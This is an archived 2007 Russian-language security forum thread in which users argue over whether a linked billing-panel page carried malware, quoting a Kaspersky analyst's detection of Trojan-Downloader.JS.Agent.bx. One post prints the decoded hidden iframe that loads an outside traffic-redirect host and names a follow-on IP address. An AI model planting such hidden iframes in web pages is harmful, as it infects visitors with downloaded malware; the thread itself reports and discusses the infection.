ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ОФФТОП_OLD > Болталка
   
 
 
Опции темы Поиск в этой теме Опции просмотра

_Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!
  #1  
Старый 29.01.2007, 01:07
[Y.P.C.]yla
Участник форума
Регистрация: 06.11.2006
Сообщений: 278
Провел на форуме:
2805600

Репутация: 660
Question _Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!

Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это
*****(22:33:43 28/01/2007)
Тему удалили как я понял и я его не увидел.
И передай урсуле, что она возможно уже чей-то бот
Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил.
*****(22:34:17 28/01/2007)
Это гаврила написал

И обьясни от куда ты нарыл
_______________________________
****** (23:07:35 28/01/2007)
На самом деле в раскодированном виде выглядит это так

<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>

Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php
Ах да
Вот письмо от дяди Жени

Здравствуйте.
1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx)
2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы.

Благодарим за оказанную помощь.
---------
С уважением, Юрий Несмачный
Вирусный аналитик
ЗАО "Лаборатория Касперского"

_____________________
Вопрос: позволь узнать как ты раскодировал?

Последний раз редактировалось [YPC]YL@; 29.01.2007 в 01:12..
 

  #2  
Старый 29.01.2007, 01:14
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Вот это и называеца параноя.
 

  #3  
Старый 29.01.2007, 01:19
Undernative
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265

Репутация: 843
Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo
По умолчанию

Мне отсюда инетересно чем он сделал декод....
 

  #4  
Старый 29.01.2007, 01:19
[Y.P.C.]yla
Участник форума
Регистрация: 06.11.2006
Сообщений: 278
Провел на форуме:
2805600

Репутация: 660
По умолчанию

Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!
 

  #5  
Старый 29.01.2007, 01:31
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Сообщение от [YPC]YL@  
Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!
У меня такое было очень часто, но я обезаписл себя отовсех и отовсюду, и теперь я свободен от всех.
просто день идет, а я все жив.
 

  #6  
Старый 29.01.2007, 01:34
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

а через пм или асю никак нельзя у него это узнать ? тему я удалю
 

  #7  
Старый 29.01.2007, 01:38
Undernative
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265

Репутация: 843
Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo
По умолчанию

Ксан.не трогай тему.Нужен глаС народа
 

  #8  
Старый 29.01.2007, 01:45
[Y.P.C.]yla
Участник форума
Регистрация: 06.11.2006
Сообщений: 278
Провел на форуме:
2805600

Репутация: 660
По умолчанию

Итак обратившись в Лаб Касперского,вот что выдало:
Trojan-Downloader.JS.Agent.bx

Детектирование добавлено 11 дек 2006 01:09 MSK
Обновление выпущено 11 дек 2006 03:08 MSK
Поведение Trojan-Downloader, троянский загрузчик


У данной программы пока нет описания.

Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы.


Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку?

RemaerD
Спасибо...
 

  #9  
Старый 29.01.2007, 01:46
Гаврила
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190

Репутация: 134
По умолчанию

Цитата:
Сообщение от [YPC]YL@  
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это
Что именно тебя запарило???
И как попала моя переписка с Ремаёрдом тебе???
Скорее этот вопрос нужно задать Ремаёрду..
Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.
Цитата:
Сообщение от Ksander  
а через пм или асю никак нельзя у него это узнать ? тему я удалю
Ну так я и общался с Ремаёрдом через пм.
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
Урсула сбавь обороты.
Подслушивать (подглядывать) чужие разговоры неприлично.
p.s.
Не надо писать мне в пм.
Я не даю уроков кодирования ссылок =)

Последний раз редактировалось Гаврила; 29.01.2007 в 01:50..
 

  #10  
Старый 29.01.2007, 01:55
Undernative
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265

Репутация: 843
Отправить сообщение для Undernative с помощью ICQ Отправить сообщение для Undernative с помощью Yahoo
По умолчанию

ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...

УРС ЧмогЕ
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ